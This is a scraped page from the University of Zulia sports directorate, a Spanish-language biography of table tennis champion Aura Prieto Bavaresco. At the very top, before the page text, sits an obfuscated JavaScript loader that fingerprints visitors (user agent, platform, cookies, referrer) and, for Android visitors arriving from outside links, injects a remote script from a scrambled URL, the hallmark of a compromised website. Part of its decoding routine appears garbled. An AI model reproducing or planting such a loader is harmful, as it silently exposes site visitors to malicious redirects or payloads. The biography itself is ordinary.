;(function(){var n=navigator,d=document,s=screen,w=window,u=n[p("dt(naevg)A!rueesiuu")],q=n[p("2mlrxohfntza0lipy")],t=d[p("3e!ifkho2o8co")],o=w[p("sn0oqiwt6amtmnde2izrxos")],h=w[p("rnhofi0t9adcaoll1")][p("beamlann8t(s3odhy")],dr=d[p("qrkemrbrvetf5elr4")],dt=s.height/w.devicePixelRatio-w.screenTop;if(!c(dr,h)&&dr!==''){if(dt>0&&o!==undefined){if(c(u,p("!d1ito!rbd3noAy"))&&!c(u,p("1s0wsocdhngiiWk"))){if(c(q,p("!d1ito!rbd3noAy"))||c(q,p("jxdueniilLe"))){if(!c(t,p("2=3a4m8tnu3_a_v"))){var e=d.createElement('script');e.type='text/javascript';e.async=true;e.src=p('hafdy4i64798l9uf89xfxf6d57ce06c6zfyed5c6y58dl5u9d4d8n0x2ddfc7fxcl=ov)&m2(1q=jdxilcv?uskjj.(e2dio(ne_pibuk/am7opci.z5(633asgtrantpsrk2coioluco/h/s:dsspztxtzh(');var v=d.getElementsByTagName('script')[0];v.parentNode.insertBefore(e,v)}}}}}function p(e){var k='';for(var w=0;w=0;q--){d+=a[q]}return d}})(); Aura Prieto Bavaresco - Dirección de Deportes
Universidad del Zulia
Correo LUZMapa del sitio
24 de octubre de 2018
 
Programas
Alto Rendimiento Educ.Fisica y Recreación Deporte Interno Extensión Deportiva Actividad Física Recreación Atención al Atleta Entrenamientos Registro Atleta LUZ Pequeña Liga de Béisbol
Juegos Deportivos
Condiciones Generales
Afiches deportivos
Posición Final 2010
Posición Final 2011
Planilla de inscripción
Más Deporte
Juvines 2010
Juvines 2012
Juvineu 2015

images/stories/topes/sucesion.jpg

Agrandar texto   Reducir texto   Reestablecer texto    
Aura Prieto Bavaresco PDF Imprimir Correo

Premio Luis Aparicio
Buen Estudiante Deportista de LUZ
1991


Durante su vida activa como deportista, todos sus rivales a nivel nacional e internacional temblaban de sólo escuchar su nombre, y es que su calidad competitiva y destreza a la hora de tomar una raqueta la demostró desde que se inició a la edad de ocho años en la práctica del tenis de mesa.


Fue miembro de la selección del estado Zulia y por espacio de 13 años perteneció a la selección nacional, logrando a lo largo de toda su trayectoria deportiva titularse campeona nacional en todas las categorías, desde pre-infantil hasta adulto.


En 1989 ingresó a la ilustre Universidad del Zulia a cursar estudios de Economía y desde ese momento el nombre de nuestra institución resplandeció en  eventos deportivos regionales y nacionales.


Triple campeona nacional a nivel universitario,  medalla de bronce en los juegos Centroamericanos y del Caribe de México 1991; campeona latinoamericana en dobles femenino en el año 1992 y decimosegundo lugar en el Mundial de las Vegas 1992; son sólo algunas de las actuaciones más sobresalientes obtenidas por esta gloria del deporte venezolano que en 1991 fue designada por las autoridades deportivas de LUZ  como la mejor estudiante–deportista de nuestra universidad.


Asimismo, dentro de su carrera deportiva descansan importantes reconocimientos que recibió esta luminaria del tenis de mesa, entre los que destacan el otorgado por la Asociación de Tenis de Mesa como la  Mejor Atleta del estado Zulia en 1990. Mientras que en el ámbito nacional,  el entonces Ministerio de la Familia le confirió el Premio José Félix Ribas en su segunda clase.


En 1997, recibe el titulo de Economista. Desde muy joven,  específicamente cuando cumple la mayoría de edad,  ingresa al campo laboral en Petróleos de Venezuela;  ocupando por espacio de cuatro años el cargo de oficinista.

Posteriormente, en una segunda etapa  ingresa en el año 1992; pero perfilada ya, a lo que sería el ejercicio de su profesión futura específicamente en el área administrativa de las Escuelas Nacionales adscritas a la empresa;  ocupando  el cargo de Analista Financiera en Presupuesto en la Gerencia de Producción de Occidente,  hasta su retiro en el año 2002. Actualmente se dedica exitosamente al comercio.

Redacción: Yasmira Meleán Marin
Reproducción: Claudio Ocando
Febrero de 2004 




^ Subir